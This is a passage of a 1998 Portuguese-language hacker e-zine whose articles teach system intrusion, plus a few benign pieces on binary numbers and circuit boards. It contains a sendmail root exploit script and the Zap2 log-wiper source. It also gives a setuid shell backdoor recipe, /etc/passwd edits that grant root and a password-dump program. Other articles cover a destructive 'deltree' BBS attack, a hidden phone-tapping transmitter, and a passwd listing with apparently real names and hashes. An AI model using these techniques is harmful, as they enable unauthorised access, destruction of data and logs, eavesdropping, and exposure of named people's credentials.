sh, digite whoami. Se vc nao for o root execute o arquivo ./sh, pronto... sm.sh -- cut here -- echo 'main() '>>smtpd.c echo '{ '>>smtpd.c echo ' setuid(0); setgid(0); '>>smtpd.c echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c echo '} '>>smtpd.c echo 'main() '>>leshka.c echo '{ '>>leshka.c echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c echo '} '>>leshka.c cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c ./leshka kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1` rm leshka.c leshka smtpd.c /tmp/smtpd cd /tmp sh -- cut here -- OBS: Depois nao esque‡a de dar um chmod +x sm.sh pra executa-lo... APAGANDO SEUS RASTROS -=-=-=-=-=-=-=-=-=-=-=- Bom, depois, se vc conseguir pegar root, vc deve dar uma vasculhada pelo sistema, afim de encontrar os arquivos de log, pro sysadmin nao saber quem esteve lah, ele pode descobrir q alguem invadiu o sistema, mas nao quem... Para isso, existem alguns programas q apagam os arquivos pra vc. Mas antes de usar algum programa, procure os arquivos, pois antes de compilar, vc tem que modificar a fonte e recompila-lo, agora com o caminho dos arquivos. Ex.: #define WTMP_NAME "/usr/adm/wtmp" Ai vai a fonte do programa ZAP: z2.c -- cut here -- #include #include #include #include #include #include #include #include #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); } -- cut here -- 1998, MaNdRaCk - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 04 - BACKDOORS -=-=-=-=-=-=-=-=-=- - Backdoor em Q-A Facam um programinha ou um questionario bem legalzinho em q-a. E de um jeito de fazer com q o sysop burrinho instale ele na bbz. Se o cara for bem idiota, ele nem vai olhar o codigo do q-a. O arq com os comandos q-a estao na hp da hack n' phreak. - Backdoor por infectacao de arqs Peguem algum DSZ infectado ou arrumem em alguma bbz um trojan maker para ra. Com eles vcs podem arrumar acesso de sysop. Eh so mandar para o sysop como no item acima. Pronto. Agora vc ja tem o acesso de sysop na bbz. E agora? vc ja pegou todos os arqs interessantes da bbz? Vamos fude-la agora. Va ao menu de msgs e mande uma msg para vc mesmo e com o corpo da msg com comandos DOS (algo tipo: deltree/y c:\*.*). Agora, va ao menu novamente e leia sua msg. Vc vai perceber algumas opcoes a mais (ja q vc esta com nivel de sysop). Vc nao vai usar todas elas, somente a opcao X (export). Nela vc pode "exportar" o texto da msg para qualquer arq do hd do cara! Mande entao exportar sua msg para o autoexec do cara! Pronto, agora a bbz escrota nao existe mais. Vc ja deve ter acessado alguma bbz q use o wgm. Aquelas bbz fraquinhas onde os lamahs acessam por modo grafico no ruindows e podem acessar inet. Bom... esse WGM eh bem seguro e muito dificil de se entrar. A unica vez q eu consegui entrar foi descobrindo o passwd do sysop. Mas ha uma luz no fim do tunel! Apesar da seguranca, essas bbz tem uma falha: O sysop. Ta... e como explorer esse BUG??? Nessas bbz, eh possivel serem confecionados aplicativos em VB3. Olha ai a nossa salvacao! O problema eh q eu ainda nao tenho a listas dos arqs ou os VBXs q se devem usar para fazer esses programas.=20 Contudo, peco a vcs, que deem um jeito de arrumar o WGM SERVER. Com isso, vamos poder descobrir os segredos dessa "falha". Quem tiver a possibilidade, mande para nos! Vamos ter o prazer de distribuir os Backdoorz feitos para o WGM. 1998, ShK - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 05 - COMPLEMENTANDO OS NUMEROS BINARIOS -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Computadores pessoais como os baseados nos microprocessadores Intel 8088 e 80286 (MUSEU :-), sao PCs de 16bits. Isto significa que podem trabalhar com numeros binarios de ate 16 casas ou bits, o que, traduzido para numeros deci- mais equivale a 65.536. Se a opreracao exigir um numero superior a esse, o PC precisa, em primeiro lugar, quebrar esses numeros em componentes menores, realizar a operacao em cada componente e entao recombinar os resultados em uma unica resposta. Os PCs mais comuns, baseados nos microprocessadores Intel 80386 e 80486, sao computadores de 32bits, ou seja, podem manipular numeros binarios com ate 32bits - o equivalente a notacao decimal 4.294.967.296. A habilidade em trabalhar com ate 32bits por vez torna esses PCs mais rapidos do que os de 16bits. Numero Decimal Numero Binario 0 0 1 1 <----- Note que como a sequencia vai mudando 2 10 a cada quatro numeros binarios e vai 3 11 repetindo os numeros apos isso... soh 4 100 se bota o numero 1 na frente de todos. 5 101 6 110 7 111 8 1000 9 1001 10 1010 11 1011 12 1100 13 1101.......... Os transistores nao sao utilizados somente para gravar e manipular nume- ros. Os bits podem tambem, significar verdadeiro (1) ou nao verdadeiro (0). As combinacoes dos transistores em varias configuracoes recebem o nome de portas logicas, quando estao dispostas em arranjos (arrays) sao chamadas de half-adders (somando parciais), que por sua vez sao combinadas em full-adders (somadores completos). Mais de 260 transistores sao necessarios para criar um somador completo (full-adder) que possa gerenciar operacoes matematicas para numeros de 16bits. Alem disso, os transistores tornam possivel que uma pequena quantidade de corrente eletrica controle outra corrente mais forte - do mesmo modo que a pequena quantidade de energia necessaria para acionar um interruptor de parede pode controlar a energia mais potente que vem atraves dos fios ate a lampada. 1998, HaCk-MaN - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 06 - BACKDOOR SH: by GhOsT InVaDeR -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Seguinte, eu nao acho que backdoor (porta dos fundos ) seja a melhor maneira de definir esta "tatica" que irei falar, mas tb nao ah outra melhor. Bom, o maior desafio de um hacker eh conseguir pegar root em um sistema e poder fazer simplesmente ALL. Mas da ateh pena em saber que depois voce nao podera voltar e conseguir o acesso root novamente a nao ser que voce instale uma boa backdoor. Todos sabemos que cada usuario tem uma shell no sistema Unix ou Linux, ate mesmo o root. Muitas pessoas que frequentam o irc pensam que shell e apenas uma conta que da acesso a telnet. Resumidamente pode ate ser isso, mas vai muito alem desta definicao o poder da shell. O arquivo shell fica a maioria das vezes no diretorio /bin/sh e define o UID, GID, etc do usuario. Ex: Voce conecta com um login= james senha=banana. Entao automaticamente a shell do usuario eh executada e o sistema identifica o ID do usuario e que tipo de acesso e permissao ele tem. Digamos entao que eu quero saber o id deste usuario. Entao eu digito id $ ID james UID=10156 GID=4 bla bla bla bla bla bla bla Putz, com esse id ele nao pode acessar quase nada no sistema. (Lembrando que quanto maior o UID menor sao suas permissoes no sistema) Agora digamos que voce conecta como root. O esquema eh o mesmo, o sistema executa o /bin/sh e identifica qual seu acesso e que permissao ele tem. No caso, total. Mas digamos que voce deseja conferir o id. Entao digite no prompt: $ ID root UID=0 GID=0 bla bla bla bla bla bla bla Ai voce pensa: __Ahhhh, o esquema ta todo naquele arquivo sh que fica no /etc. Isso mesmo. Agora, o que isso tem a ver com backdoor?? Bom, supondo que voce esteja com acesso root, siga esses passos: 1) Escolha um diretorio nao suspeito ou crie um subdir. 2) Copie o /bin/sh pra dentro dele obs: de preferencia oculto, salve com o ponto na frente .sh 3) Agora de permissao a ele para que qualquer usuario possa executa-lo use: chmod 777 .sh 4) Pegue o /etc/passwd (voce tambem pode criar um usuario com shell no sistem a, mas eh muito arriscado) 5) Saia do sistema e desencripte o passwd. 6) Escolha um usuario qualquer que tenha shell e volte no sistema 7) Execute o .sh que voce copiou e bingo!! voce tem id de root 8) Digite ID para conferir seu uid. Simples mas eficaz. Ahh, voce nao entendeu? entao vou passar o que fazer em comandos: COMO ROOT FACA: $ cp /bin/sh /tmp/.sh $ chmod 777 /tmp/.sh $ cat /etc/passwd (ou crie um usuario: adduser login_cara) $ logout desencripte uma senha ou entre com a conta que voce criou. COMO USER COMUM FA€A: $ ID james UID=10156 GID=4 bla bla bla bla bla bla bla $ cd /tmp $.sh $ ID root UID=0 GID=0 bla bla bla bla bla bla bla BINGO!! Agora voce tem o id de root. Ah outra forma de usar o UID e GID. Digamos que o provedor que voce esteja eh bem grande e contem uma vasta lista de usuarios que contem shells em seu passwd. Agora fica facil, basta editar o /etc/passwd e mudar o UID e GID de algum usuario para 0. Obs: Nao esqueca que esse metodo eh arriscado, e que se o usuario que voce escolheu mudar a senha voce nao podera voltar mais. Obs2: Confira se nao ha um backup do passwd, geralmente -passwd, passwd-, .passwd etc... Vou supor que la tenha o editor pico: $ PICO /etc/passwd ______mude aqui | | pparo:CMjZikulXQqK.:0:0:PAULA DORNHOFER PARO:/home/EE97/pparo:/etc/sh goroh:grwta/Jaq5vpg:10272:1011:Andre de Oliveira Fernandes - 900160:/home/EC90/goroh:/bin/csh teixeira:bNTBqVVSd5zCI:10495:1011:Gustavo F. Teixeira:/home/EE93/teixeira:/bin/csh rodolfon:0AzVjyyD40TFU:10177:1011:Rodolfo Jose Leite Netto:/home/EE92/rodolfon:/bin/csh isa9000:yOs699b9JJ4I6:10632:1011:Isabella Sousa Carreira:/home/EE93/isa9000:/bin/csh daniloa:sfsS0gQr.J.zM:9399:1011:DANILO ANGELO - 950424:/home/EC95/daniloa:/bin/csh alcaraz:QswOnrLt/sn62:10209:1011:Carlos Alberto Duarte Alcaraz:/home/EE92/alcaraz:/bin/csh pinho:GHV/.J8MdGdBU:10256:1011:Fernando Correa de Araujo Pinho:/home/EC91/pinho:/bin/csh hideo:lLt//EJT7klnE:10186:1011:Edson H. Fujishima - 930187:/home/EE93/hideo:/bin/csh tatiana:zCr9VVfVXDLpM:10750:1011:Tatiana Steckelberg Iwashima:/home/EC93/tatiana:/bin/csh mauric0:rPmUtvNcTtZt2:10190:1011:Mauricio Dester:/home/EE87/mauric0:/bin/csh :aperte ctrl + x pra sair e salve quando solicitado. $ logout agora volte com o login e a senha deste usuario que voce alterou o id que voce ja entra com ID 0 (acesso total) GhOsT InVaDeR (ghostin@freemail.globalsite.com.br) 1998, GhOsT InVaDeR - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 07 - PLACAS DE CIRCUITO IMPRESSO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Bom, o q me levou a escrever essa materia foi o fato de q eu ja to cansado de ficar falando sobre boxes sem dar o projeto de uma BOX interessante, pen- sando nisso, resolvi passar nesta edi‡ao, uma box q transmite as conversas telefonicas. Eh uma placa pequena, q vc deixa dentro do fone, eh isso mesmo, dentro do fone!!! Mas tem aqueles q nunca tiveram um contato aprofundado com a eletronica, entao, pensando nessas pessoas q eu vou escrever isso aki. Ninguem precisa saber o q um capacitor de 100uF faz para montar esses pe- quenos projetos, basta seguir todas as indica‡oes do diagrama e montar adequa- damente para ele funcionar, mas para a placa ficar melhor ainda, eu sugiro q vc treine um pouco sua habilidade de soldar, pois alem de seu trabalho ficar melhor, a box q ensino, eh muito pequena, e uma solda mal-feita pode danificar todo o circuito, pra come‡o de conversa vc vai precisar de: - Um soldador (aquele ferro q esquenta) - Solda (aquele ferro mole q vem enrolado) Isso eh essencial para vc come‡ar uma pequena soldagem. Eh logico q vc tmb vai precisar de alguma coisa pra soldar, pegue uns fios velhos para praticar. Pronto, coloque o soldador na tomada e espere esquentar. Depois de um tempo ele vai estar bem quente (cuidado pra nao fazer uma tatuagem) pegue a solda e aproxime do local a ser soldado, entao com a ponta do soldador, encoste na solda, para q ela derreta e entre em contato com o local desejado, no nosso caso, onde os fios se unem. Ok, vc precisa de um diagrama: Soldador - \\ / - Solda \\ / \\ / =========----*----============ - fios | Solda feita Ahm, eu sei o diagrama ficou uma merda e nao ajudou em nada, pelo menos ocupa um espacinho, hehehe... Bom, voltando a aula, nao deixe a solda pingar na mesa ou em vc, ela eh quente tmb. Ela seca rapido em questao de segundos. Para a soldagem de componentes na placa, o esquema eh o mesmo, vc poe os terminais do componente nos seus devidos buracos e solda, o que sobrar vc cor- ta fora, nao puxe a perninha fora, corte com um alicate de corte... Soh um lembrete: Na hora de soldar o componente, nao solde fora da trilha nem apenas o terminal, solde de uma maneira em q o terminal fique bem conecta- do a trilha. Sobre soldagem eh soh isso, nao eh nada teorico, precisa de pratica... Vamos a parte da confec‡ao da placa: OBS.: Muito cuidado ao usar o ferro, lembre-se q ele se aquece em temperaturas acima dos 300 graus Celsius CONFECCIONANDO A PLACA DE CIRCUITO IMPRESSO Antes de tudo vc precisa comprar a placa, ela tem um dos lados cobreados e pode ser encontrada facilmente em casas de eletronicos, peca um tamanho ade- quado para a montagem q vc vai realizar. Agora o nosso proximo passo eh fazer as trilhas para a eletricidade passar por onde ela deve. Vc pode ver em qualquer livro ou revista como ela eh, vou tentar fazer um diagrama, mas eh ruim: Placa de Circuito Impresso: ______________________ | | OBS.: Pra ninguem vim me perguntando o q essa | o----\ o o o o | placa faz: Ela eh soh um EXEMPLO, nao faz | o--\ | | | nada, tanto q estah incompleta... | | \----o o o o | | \---o | | | | o----/ | | | o------/ | |______________________| Onde: o = buraco onde passa o terminal do componente (Ilha) / = curva \ = curva -- = trilha Bom, em varios lugares existem uns decalques pra vender para fazer as pla- cas, no meu caso, eu uso um metodo mais simples: Tiro um xerox ou desenho a placa no tamanho original (que ela devera sair) e com um estilete, corto as trilas (do papel, eh claro) para q fique um molde, entao coloco em cima da parte cobreada da placa, fixo com durex se necessario, e passo o esmalte... Esse eh um metodo q eu utilizo, se vc quiser utilizar um outro problema seu Bom, vamos come‡ar entao. Quando vc tiver em maos a chapa cobreado, serre-a de acordo com suas necessidades, depois de um jeito nela para q fique bem brilhan te, passe um bombril, ou coisa assim. Depois q ela tiver bem bonitona, tenha em maos o molde, ou o decalque, ou a merda q vc vai usar pra marcar as trilhas Eu recomento q vc marque os locais onde vc tem q fazer o furo, fica mais facil depois. Entao passe o esmalte, ou o decalque, depois de a placa ter suas tri- lhas marcadas, vc pode preparar o pecloreto para deixar ela lah. Fa‡a isso: Compre um pote de Percloreto de Ferro, ou po de percloreto, e dissolva em agua, dissolva na quantidade de agua q ta marcada na embalagem do po. Dissolva numa bacia, ou outro lugar para colocar a placa. Nao se preocupe se colocar percloreto demais, ele pode ser usado novamente. Depois q vc colocar o po vai ocorrer uma rea‡ao quimica, cuidado pra nao respirar o vapor q vai sair de lah, pois eh toxico, e fa‡a isso ao ar livre, nao deixe nenhum material meta- lico entrar em contato com o vapor, para evitar a corrosao. Depois q vc fez a mistura, coloque a placa lah dentro, se quiser amarre um fiozinho, eh mais facil de tirar depois. Para dissolver mais rapido, fique balan‡ando a bacia, ou puxe o fio pra lah e pra cah... Deixe lah ate q o cobre saia todo, ficando apenas as partes q vc marcou, seja com o decalque ou com o metodo q vc usou. Nao boie, nao deixe a placa por muito tempo, senao jah era o seu projeto. Nao estranhe se quando vc tirar a placa ficar meia rosada. Depois vc pode lava-la com agua e guardar o perclore- to num pote qualquer, desde q esteja bem protegido. Depois de lavar a placa, vc pode tirar o decalque com bombril, ou se vc usou esmalte, tire com um algo- dao e acetona. Agora soh falta furar a placa e pronto... Na hora de furar, fa‡a o furo ideal, nao muito largo, o essencial pro terminal passar... Aih estah sua placa de circuito impresso... OBS.: Guarde a sobre do percloreto num recipiente PLASTICO, pois ele eh alta- mente corrosivo ao metal 1998, MaNdRaCk - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 08 - BOX - TRANSMISSOR FM OCULTO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Ai estah um projeto de uma box para linhas NACIONAIS, q transmite conversas telefonicas em FM. Daih vc pergunta, o e q tem de tao incomun nisso? Incomum eu nao diria, eu diria interessante. Essa maravilha opera na faixa dos 60 a 100 Mhz, transmitindo todas as conversas num raio de + ou - uns 40 m. E o melhor de tudo, ela vai escondida dentro do telefone... E tem mais, nao precisa de pilhas, eh alimentada pela propria linha telefo- nica!! Ohh. A unica desvantagem desse circuito eh q a placa de circuito impresso tem q ser pequena o bastante para entrar dentro do fone, nos padroes, vc podera fa- ze-la no maximo com 2,3 cm de largura, portanto, se vc nao tem muita pratica na soldagem e confec‡ao de placas de circuito impresso, nem tente fazer esse projeto, senao eh um desastre na certa... Outra desvantagem eh q o som do telefone "boxeado" fica mais baixo, mas nada q interrompa o processo. A instala‡ao do aparelho eh outra vantagem, vc precisa apenas abrir o fone, aquele q vai em cima do gancho, e prender os jacares nos terminais, sem precisar observar a polariza‡ao... MATERIAL NECESSARIO: Q1 - BF494 - transistor NPN de RF D1, D2, D3, D4 - 1N4148 - diodo de uso geral (1/8 W, 5%) R1 - 1K ohm R2 - 1,2 K ohms C1, C3 - 1 nF - ceramico C2 - 10 pF - ceramico L1 - bobina pequena DIAGRAMA: 1k o-------|||||------ |----------- ------o--------- jacare 1 | | | / | | | | | \ |C2 | /o\ | |---o ---10pF | D1 D2 | \ --- | ----o o------o L1 / | | | D3 D4 | \ | | | \o/ | | | / | | | o-------------|/ Q1 | | ___ |\ BF494 | | ___ C1 \ o-------------------- | 1 nF | jacare 2 | | | | | ----------------o | | | | | | ___ == R2 | | ___ C3 == 1K | | | 1 nF | -----------------o---------------o---------------- o = liga‡oes O diagrama tah meio complicado mas eu acho q dah pra entender. Nao vai dar pra fazer a placa de circuito impresso em ASCII, se vc tiver mais experiencia vai conseguir fazer uma naboah, mas se vc eh inexperiente, aguarde q eu colo- co um GIF na home page do PHR pra Download. Se vc tiver acesso a componentes SMD eh melhor ainda, a placa fica bem menor, mas se vc nao tiver, dah pra construir tranquilo assim. L1 eh a bobina. Para fazer a bobina escolha um fio esmaltado 26 a 28, com diametro de uns 5 mm. Para faixas em FM fa‡a com 2+2 espiras. As saidas podem ser feitas com fios de uns 10 cm, com jacares, ou ou- tra coisa q prenda bem, para nao causar nenhuma interferencia na transmissao ou mesmo pra nao se soltar com o balan‡o do fone, principalmente se alguem deixar cair no chao. Para testalo, pode testar em seu telefone, ou com tres pilhas (4.5 V). Pegue o receptor q vc vai usar, pode ser um radio portatil co- mum e ajuste numa frequencia entre 60 e 100 Mhz. Fique apertando e soltanto as espiras para ajustar a frequencia, enquanto tenta achar com o receptor. Depois de achar a frequencia certa, cuide para nao mexer a bobina, e marque em um pa- pel ou coisa assim. Depois eh soh instalar no telefone q quiser, e abracadabra pronto, lembre-se q ele vai transmitir sempre q o fone for tirado do gancho. 1998, MaNdRaCk - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 09 - SHADOW PASSWD -=-=-=-=-=-=-=-=-=-=-=- Bom... o que vou falar e sobre uma coisa muito lamer e que todos DEVERIAM saber..... SHADOW! Aparece cada um com uns arquivos falando que tem as senhas e que e hacker... o arquivo de senhas (geralmente chamado de passwd) e assim: login:senha:id:uid:comentario:command.com Quando voce acha um arquivo que tenha no lugar da senha um monte de LETRAS, voce teve muita sorte! Ou o provedor ‚ uma droga ou voce pego um root muito lamer! Ficaria mais ou menos assim um arquivo SEM shadow: root:N48dydkljSf3:0:0::/bin/sh Bem... se voce arranjou alguma coisa assim.. procure um desencriptador LOGO! Uns do que eu conheco e: Cracker Jack 1.4 (Windows), Jhuck (Windows) e mais uns que eu nunca vi funcionar direito! Pra conseguir eles... e so andar um pouco pelas HP's hackers por ai! Mais caso voce tenha achado um arquivo passwd da seguinte forma: root:*:0:0::/bin/sh root:!:0:0::/bin/sh (Uma dessas formas, existem varias... essas sao comuns) root:X:0:0::/bin/sh Se voce achou um arquivo com essas formas acima mais tem acesso nesse provedor por telnet... ai a coisa muda! Tem um monte de geito de "tirar" o shadow dos arquivos... e so ter vontade de procurar que voce acha por ai! Um muito simples que funciona mais ou menos bem e o UNSHAD. Voce encontra ele por ai em qualquer lugar! Aqui tem uma c¢pia em C. Vocˆ deve usar o compilador c(cc) do Unix para compilar o unshad e usa-lo digitando unshad >> arquivo_senhas. cc -o unshad unshad.c unshad >> senhas.dat No caso, as senhas encontradas serÆo armazenadas no arquivo senhas.dat --------------------------------UNSHAD.C--------------------------------- #include main () { struct passwd *p; while(p=getpwent ()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } ---------------------------------------------------------------------- Mais e se voce nao tem acesso por telnet? Bom, com sorte voce acha um arquivo passwd que tenha UM login com a senha unshadow. Desencripte ela e logue por telnet! Geralmente as senhas usadas em log por FTP tem acesso em TELNET tambem! Ai e fazer a festa! Como esse assunto e muito lamer mais muitas pessoas nao sacam isso... paro por aqui! Se a galera ajudar ae... continuamos no proximo zine com coisas mais interessantes!!!! 1998, SideW - HackPHR Zine -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 10 - CORREIO DA GALERA -=-=-=-=-=-=-=-=-=-=-=-=-=- Aki estao alguns mails q recebi com o passar do tempo. Alguns eu jah respondi antes, por e-mail, mas nao deu pra responder todos, portanto veja a resposta agora... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Bom, de novo , o mesmo merda de internauta volta a te ecrever, novamente te pedidno ajuda. O que eu queria saber e pra que servem as green boxes ?? Quais sao sua finalidades ?/ Estou te escrevendo isso pq eu arrumei um programa , como um nome babaca, chamdo phreakzoid, esse programa tem a capacidade de imitar atrves de sons a Silver, Red, Blue e a Green box. Li na sua zine sobre todas , menos a green !! Sera que da para dar um ajudinha ?? Velue !!! Se vc quiser este programa e so pedir !!! Muito agradecido. obs: Eu tb arrumei um outro programa chamdo boxtone, mas eu ainda nao consegui descobrir a sua finalidade !!! Gostaria de saber se posso tomar a liberdade de te mandar este porgram, sao apenas 6 kb ! Para vc assim descobrir a sua funcao !! RESPOSTA: Todas essas boxes q vc se refere nao funcionam aki no Brasil, portanto, jah q vc eh begginer, comece estudando apenas as boxes q funcionam aki no Brasil, o programa BoxTone, provavelmente eh um gerador de sons em varias frequencias, parecido com o BB q eu fiz, e estah na Home Page do zine. Mas pra nao dizer q nao respondi sua pergunta, a Green Box cria tres tons diferentes, o tom de COIN CO- LLECT, o de COIN RETURN, e o de RINGBACK... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- olah... desculpe a invasao... serah que vc poderia me mandar textos sobre PGP??? tipo... o que eh.. como usar... etc.... sou totalmente leiga no assunto.. porem tenho grande vontade em saber... agradeco... e aguardo noticias []s RESPOSTA: Pode aguardar a edi‡ao 04 q o Cebola vai fazer um tutorial sobre o PGP ok? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Cara, achei legal o seu zine, contem informações uteis e certas é dificil achar na internet textos assim sou programador C , e gostei da seção sobre virus, etc. Daniel. RESPOSTA: Ok, mas vc tem q agradecer ao Cebola e nao a mim, vcz devem mandar criticas e sugestoes das materias de seus respectivos autores... O mail do Cebola eh: cebola_br@hotmail.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Se vc quiser por um link da sua página na minha mande o endereço da sua e se vc tiver o logo mande junto... http://www.terravista.ciclone.com.br/areiasbrancas/1365/index.html RESPOSTA: Eh logico, pode por quantos linkz quiser... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Primeiro, parabéns pela Zine. 10. .... Eu queria saber uma coisa, qual o endereço do arquivo, especificadamente, que eu nao achei nada lah. E tb, como eu posso downloadar esse SO via NET se eu vi pra vender em dois CDs ? RESPOSTA: Sim, o Linux eh vendido completo em CD, mas se vc nao quiser comprar o CD pode pegar de gra‡a em varios endere‡os, eh soh procurar: http://www.sunsite.unc.edu ftp://ftp.cdrom.com/pub/linux -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ae, eu sou um leitor de seu zine, que por sinal é otimo e gostaria de saber se vc tem endereços de mais zines valeu ae beakman RESPOSTA: Na HP do PHR tem tudo q eh zine... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- A aí, bele? Cara eu tenho lido seu zine, achei 10 , mas tenho tido uns proble- minhas quanto as dicas phreak. Posso me considerar um hacker de certa experi- ência, mas nuca me interessei por phreak. Agora ví que também é muito loco. Minha zica é com o lance dos cartões telefônicos. Não consegui fazer funcionar nada daquilo que vc indicou. Segui os passos e não deu nada certo. Será que vc pode dar um help? Valeu, meu nick é Cable Guy. RESPOSTA: Poize, hehehe, aquelas merda nao funcionam mezmo... Mas pode crer cara, na proxima edi‡ao (04 - Mar‡o) vou colocar uma materia com as voltagens dos telefones a cartao, aguarde... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- olah... como faco para conseguir as versoes anteriores do "Manual de Violação a Telefones Públicos e Privados " ?????? obrigada RESPOSTA: Vc soh digita no Cade? Vai aparecer, mas eu nao recomendo as versoes anteriores, a unica diferen‡a sao corre‡oes, e tem as mesmas coisas das mais novas, algumas a menos, se vc tem a mais nova nao precisa da mais velha, eh igual... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Cara, Adorei o seu e-zine, e D +. Para mim que estou comecando agora (como vcs dizem sou um begginer), e' otimo. Mas voltando ao assunto do sbject, eu queria dar um toque em vcs: e sobre os americanos. Americanos somos todos nos que nascemos no continente chamado America. Os bundoes que nascem no pais Estados Unidos, sao ESTADUNIENSES. Claro que, eles tb sao americanos, mas nao tao quanto nos. Eles sao tao arrogantes que se intitularam como donos da America ate no nome. E cara, aproveitando a deixa, vc poderia me ajudar em uma coisa: Eu chequei num arquivo passwd de 55k, mas nao consigo copia-lo. Eu do o comando mas so chega o arquivo com 0k. como eu contorno isso? REPOSTA: Humm, tens razao, os Americ... opz, os Estadunienses sao uns bundoes. Mas vc deve notar q quando falo Americanos, nao me refiro aos Sul- Americanos, e sim aos Norte-Americanos. Quanto ao seu problema de Download do passwd, eh o seguinte: Provavelmente vc usa o prog FTP do Linux ou do Win95. Acontece que quando vc dah o comando "get passwd" ele nao vai verificar se o ar- quivo existe ou nao e falar pra vc, ele soh vai tentar copiar dire- to, portanto se ele nao existir ele vem com 0k. O q deve ter de erra- do eh q vc nao estah digitando certo, ou estah digitando em MAIUSCU- LAS, um erro q nunca deve ser cometido no UNIX, ou simplesmente vc nao estah indo no diretorio correto, que seria /etc. Para conferir o dir. atual de um "pwd"... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- carai, manow... óia teu zine ta phods, arretado msmo... mas como p/ toda regra existe uma excecao, tenho de comentar algumas coisas: mermao, p/ que usa tantos sinais? sempre que faco o download e abro aparece com um monte de caracteres especiais que sinceramente dificultam um pouco a leitura de materias mais tecnicas... a área phreack tambem precisa ser rearranjada, colocar mais material, coisas mais materias tecnicas a respeito da telefonia brasileira e nao o carai da americana... a área anarchy, sem comentarios, nao curto esse negocio de mini-terrorismo, mas nada contra... a virii zone ta muito boa, o editor realmente merece os creditos... so uma coisa: nos proximos numeros, jah que a revista eh direcionada à turma iniciante, coloca algumas materias a respeito de interesse geral da galera, tipo descricao das operacoes basicas de funcionamento de alguns programas, como o pgp, por exemplo... ok manow? po vei, valew pela atencao e espero que corra tudo bem por ai, manow... OUTof|ORDER RESPOSTA: Como eu ja disse, isso eh pro EDIT do MS-DOZ, nao pro MicroBost 